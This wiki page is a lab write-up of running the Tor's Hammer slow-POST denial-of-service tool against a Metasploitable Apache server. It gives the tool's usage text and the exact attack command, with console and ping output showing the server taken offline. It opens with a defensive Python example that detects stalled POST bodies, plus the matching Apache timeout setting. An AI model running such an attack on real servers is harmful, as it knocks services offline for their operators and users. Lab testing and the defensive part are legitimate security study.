From charlesreid1

Revision as of 04:02, 29 March 2016

Tor's Hammer Slow Body DoS Attack

Tor's Hammer (https://sourceforge.net/projects/torshammer/) is a tool that uses the slow body attack to swamp Apache servers and cause a denial of service (DoS). It does this by sending a POST request with a large declared content-length, then sending data one bit at a time.

Tor's Hammer, in particular, provides a Python script that enables running the slow body attack through a web proxy like Tor, to provide anonymity. It also implements other disguising elements like a slew of User Agent headers.
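The attack described above works because the server keeps a worker waiting for a body that never finishes arriving. The check below is an added example, not code from the Tor's Hammer project or from this page: it models the rule Apache's mod_reqtimeout applies to request bodies (an initial time allowance that is extended only as bytes actually arrive) over a set of constructed connection records, and then counts how many stalled bodies each source address is holding. The BodyTransfer fields, the function names and the sample addresses are assumptions for illustration.

```python
from dataclasses import dataclass
from typing import Dict, Iterable


@dataclass(frozen=True)
class BodyTransfer:
    """One in-progress POST body as the server sees it (records below are constructed)."""
    client: str           # source address of the connection
    content_length: int   # declared Content-Length header, in bytes
    bytes_received: int   # body bytes actually received so far
    elapsed_s: float      # seconds since the request headers were complete


def body_timeout_exceeded(t: BodyTransfer, initial_s: float = 20.0,
                          min_rate_bps: int = 500) -> bool:
    """Apply the mod_reqtimeout rule `body=<initial_s>,MinRate=<min_rate_bps>`:
    the client gets initial_s seconds up front, and the deadline grows by one
    second for every min_rate_bps bytes it delivers. A trickle of a few bytes
    per second never earns enough extra time and is cut off; a slow but steady
    upload keeps extending its deadline and is left alone."""
    if t.bytes_received >= t.content_length:
        return False  # body complete; nothing left to wait for
    deadline_s = initial_s + t.bytes_received / min_rate_bps
    return t.elapsed_s > deadline_s


def suspicious_sources(transfers: Iterable[BodyTransfer], min_connections: int = 10,
                       **rule) -> Dict[str, int]:
    """Count timed-out bodies per source address and return the addresses holding
    at least min_connections of them: one stalled client may be a bad link, but
    dozens of parallel stalled bodies from one address is the shape of a slow-POST tool."""
    counts: Dict[str, int] = {}
    for t in transfers:
        if body_timeout_exceeded(t, **rule):
            counts[t.client] = counts.get(t.client, 0) + 1
    return {client: n for client, n in counts.items() if n >= min_connections}


# Constructed sample: 12 connections from one address each declare a 1 MB body
# and have delivered 100 bytes in 60 s; three other clients behave normally.
SAMPLE_TRANSFERS = [
    BodyTransfer("198.51.100.7", 1_000_000, 100, 60.0) for _ in range(12)
] + [
    BodyTransfer("198.51.100.20", 5_000_000, 3_000_000, 30.0),  # fast upload in progress
    BodyTransfer("198.51.100.21", 200_000, 50_000, 100.0),      # slow link, but steady
    BodyTransfer("198.51.100.22", 4_096, 4_096, 0.5),           # already complete
]

if __name__ == "__main__":
    for client, n in suspicious_sources(SAMPLE_TRANSFERS).items():
        print(f"{client}: {n} stalled POST bodies")
```

Metasploitable's Apache 2.2.8 predates mod_reqtimeout, which arrived in 2.2.15; on a newer Apache the equivalent server-side setting is `RequestReadTimeout header=20-40,MinRate=500 body=20,MinRate=500`. The per-source count is the detection side of the same observation: a tool that holds one connection per thread, with a 256-thread default, shows up as a single address holding a large number of bodies that never reach their declared Content-Length.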

We'll test this tool out on the Metasploitable machine, which is running Apache 2.2.8, and see if it is vulnerable to the Tor's Hammer DoS attack. If so, we'll mount the attack.

Python Script

To run this attack, use the torshammer.py script from the link above.

$ python torshammer.py

/*
 * Tor's Hammer
 * Slow POST DoS Testing Tool
 * Version 1.0 Beta
 * Anon-ymized via Tor
 */
./torshammer.py -t <target> [-r <threads> -p <port> -T -h]
 -t|--target <Hostname|IP>
 -r|--threads <Number of threads> Defaults to 256
 -p|--port <Web Server Port> Defaults to 80
 -T|--tor Enable anonymising through tor on 127.0.0.1:9050
 -h|--help Shows this help

Eg. ./torshammer.py -t 192.168.1.100 -r 256

Run this against the IP address of the Metasploitable machine, 10.0.0.27:

# python torshammer.py -t 10.0.0.27

This will run with the default number of threads (256).

Results

This works like a charm, bringing the target 10.0.0.27 to its knees:

TorsHammer.png

Bingo!

Note that a large number of errors are printed; `[Errno 24]` is the attacking machine hitting its own per-process open-file limit, since each thread opens its own socket:

error: [Errno 24] Too many open files
Thread broken, restarting...
Exception in thread Thread-1:
Traceback (most recent call last):
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner
  File "torshammer.py", line 112, in run
  File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__
error: [Errno 24] Too many open files
Thread broken, restarting...
Exception in thread Thread-65:
Traceback (most recent call last):
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner
  File "torshammer.py", line 112, in run
  File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__
error: [Errno 24] Too many open files
Thread broken, restarting...
Exception in thread Thread-17:
Traceback (most recent call last):
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner
  File "torshammer.py", line 112, in run
  File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__

However, these don't seem to affect the attack, as the web server is inaccessible even while the error messages are being printed out.

Bringing Down The Server

Ping Down

At some point during the attack, the machine stopped responding to ping:

ping: sendto: Host is down
Request timeout for icmp_seq 874
ping: sendto: Host is down
Request timeout for icmp_seq 875
ping: sendto: Host is down
Request timeout for icmp_seq 876
ping: sendto: Host is down
Request timeout for icmp_seq 877
ping: sendto: Host is down
Request timeout for icmp_seq 878
ping: sendto: Host is down
Request timeout for icmp_seq 879
ping: sendto: Host is down
Request timeout for icmp_seq 880
ping: sendto: Host is down
Request timeout for icmp_seq 881
ping: sendto: Host is down
Request timeout for icmp_seq 882
ping: sendto: Host is down
Request timeout for icmp_seq 883
ping: sendto: Host is down
Request timeout for icmp_seq 884
ping: sendto: Host is down
Request timeout for icmp_seq 885
ping: sendto: Host is down
Request timeout for icmp_seq 886
ping: sendto: Host is down
Request timeout for icmp_seq 887
ping: sendto: Host is down
Request timeout for icmp_seq 888
ping: sendto: Host is down
Request timeout for icmp_seq 889
ping: sendto: Host is down
Request timeout for icmp_seq 890
ping: sendto: Host is down
Request timeout for icmp_seq 891
ping: sendto: Host is down
Request timeout for icmp_seq 892
Request timeout for icmp_seq 893
Request timeout for icmp_seq 894
Request timeout for icmp_seq 895
Request timeout for icmp_seq 896
Request timeout for icmp_seq 897
Request timeout for icmp_seq 898
Request timeout for icmp_seq 899
Request timeout for icmp_seq 900
Request timeout for icmp_seq 901
Request timeout for icmp_seq 902
Request timeout for icmp_seq 903
Request timeout for icmp_seq 904
Request timeout for icmp_seq 905
Request timeout for icmp_seq 906
Request timeout for icmp_seq 907

Memory Squeeze

It turns out the machine ran out of memory, and the network device began dropping packets:

This attack completely knocked the server offline.

TorsHammer OfflineMemSqueeze.png

Flags